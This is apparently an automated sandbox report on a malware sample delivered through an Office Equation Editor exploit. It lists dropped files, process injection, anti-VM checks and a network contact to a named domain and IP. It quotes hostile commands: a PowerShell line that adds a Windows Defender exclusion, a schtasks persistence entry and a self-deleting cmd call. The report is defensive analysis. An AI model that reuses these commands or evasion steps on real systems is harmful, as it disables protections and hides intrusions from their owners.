          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, vbc.exe, 00000009.00000003.473074012.0000000000930000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.472123384.00000000007D0000.00000004.00000001.sdmp, vbc.exe, 00000009.00000002.509705783.0000000000C40000.00000040.00000001.sdmp, rundll32.exe
          Source: Binary string: rundll32.pdb source: vbc.exe, 00000009.00000002.508502052.00000000006F9000.00000004.00000020.sdmp, vbc.exe, 00000009.00000002.506009358.0000000000030000.00000040.00020000.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: vbc[1].exe.2.dr, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: vbc.exe.2.dr, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: OmnbtuhFsJys.exe.4.dr, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.2.vbc.exe.80000.0.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.0.vbc.exe.80000.0.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 9.0.vbc.exe.80000.0.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 9.0.vbc.exe.80000.4.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 9.0.vbc.exe.80000.5.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 9.0.vbc.exe.80000.3.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 9.0.vbc.exe.80000.9.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 9.0.vbc.exe.80000.1.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 9.0.vbc.exe.80000.7.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 9.0.vbc.exe.80000.2.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F1298 push esp; retn 0023h
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F9B39 push ss; ret
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F9B02 push ebx; ret
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F8F9A push edx; ret
          Source: C:\Users\Public\vbc.exeCode function: 9_2_004171DD push eax; retf
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00417AC9 push edi; retf
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041A2E3 pushad ; iretd
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041D4C5 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041D57C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041D512 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041D51B push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ADDFA1 push ecx; ret
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0036E9B5 push esp; retn 0000h
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0036EB1E push esp; retn 0000h
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0036EB02 push esp; retn 0000h
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0259DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000A71DD push eax; retf
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000AA2E3 pushad ; iretd
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000AD4C5 push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000AD51B push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000AD512 push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000AD57C push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000A7AC9 push edi; retf
          Source: initial sampleStatic PE information: section name: .text entropy: 7.77362197724
          Source: initial sampleStatic PE information: section name: .text entropy: 7.77362197724
          Source: initial sampleStatic PE information: section name: .text entropy: 7.77362197724
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OmnbtuhFsJys" /XML "C:\Users\user\AppData\Local\Temp\tmpC92A.tmp

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xEB
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000004.00000002.473128964.00000000023E1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 3028, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: vbc.exe, 00000004.00000002.473128964.00000000023E1000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: vbc.exe, 00000004.00000002.473128964.00000000023E1000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000000099904 second address: 000000000009990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000000099B7E second address: 0000000000099B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2796Thread sleep time: -120000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2592Thread sleep time: -30293s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2064Thread sleep time: -60000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2152Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2128Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00409AB0 rdtsc
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 30293
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: vbc.exe, 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 0000000A.00000000.552591069.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: vbc.exe, 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: vbc.exe, 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmpBinary or memory string: Y4*vMciU,ho)r;
          Source: explorer.exe, 0000000A.00000000.552591069.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000003.472102078.0000000000809000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 0000000A.00000000.552449916.000000000449C000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0loQ&
          Source: explorer.exe, 0000000A.00000000.490732590.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 0000000A.00000000.493807218.00000000045D4000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: vbc.exe, 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00409AB0 rdtsc
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AC0080 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AC00EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AE26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025A26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0040ACF0 LdrLoadDll,
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 52.128.23.153 80
          Source: C:\Windows\explorer.exeDomain query: www.metafirstclass.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: D80000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1764
          Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 1764
          Adds a directory exclusion to Windows DefenderShow sources
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OmnbtuhFsJys" /XML "C:\Users\user\AppData\Local\Temp\tmpC92A.tmp
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
          Source: explorer.exe, 0000000A.00000000.549499857.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.491344404.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.483588339.0000000000750000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
